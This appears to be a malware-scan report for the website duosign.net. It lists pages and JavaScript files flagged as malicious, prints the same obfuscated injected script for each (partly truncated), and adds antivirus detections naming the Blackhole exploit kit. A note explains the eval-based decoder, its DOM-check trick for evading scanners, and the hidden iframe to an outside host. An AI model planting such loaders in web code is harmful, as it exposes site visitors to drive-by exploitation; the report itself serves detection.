Request | Server response | Status |
http://duosign.net/ | 200 OK Content-Length: 29126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
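... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Note on the sample: each array element is parsed as base 16 and reduced by 7, and the resulting character codes are joined with String.fromCharCode and executed through `r`, an alias of eval. The decoded script runs only if decrementing `document.body` throws, as it would in a browser DOM, so scanners that do not emulate the DOM may never see it. The visible part of the data decodes to script that creates an iframe (source host artfull[.]de) and checks and sets a `visited_uq` cookie, consistent with the iframe and Blackhole detections listed below. The same block is injected into every file flagged in this report.
Antivirus reports:
- AntiVir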
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery-1.7.1.min.js | 200 OK Content-Length: 98693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/forms.js | 200 OK Content-Length: 10453 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery-ui-1.8.16.custom.min.js | 200 OK Content-Length: 24126 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/all-in-one-min.js | 200 OK Content-Length: 4823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/setup.js | 200 OK Content-Length: 8829 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery.flexslider-min.js | 200 OK Content-Length: 16177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/index.php | 200 OK Content-Length: 29126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/psd-to-html.php | 200 OK Content-Length: 42395 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/jquery-1.7.2.min.js | 200 OK Content-Length: 98693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/quote.js | 200 OK Content-Length: 11750 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/js/quote2.js | 200 OK Content-Length: 10349 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,6e,6a,6b,6e,76,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6e,6a,6b,6e,76,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6e,6a,6b,6e,76,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,68,79,7b,6d,7c,73,73,35,6b,6c,36,4b,61,4d,60,6b,4f,5f,52
... 3550 bytes are skipped ...7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6e,6a,6b,6e,76,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));
Antivirus reports:
- AntiVir
- JS/Blacole.EB.48
- Avast
- JS:Includer-ALC [Trj]
- nProtect
- JS:Exploit.BlackHole.AY
- Comodo
- TrojWare.JS.Agent.HN
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
|
http://duosign.net/portfolio.php | 200 OK Content-Length: 21900 Content-Type: text/html | malicious |
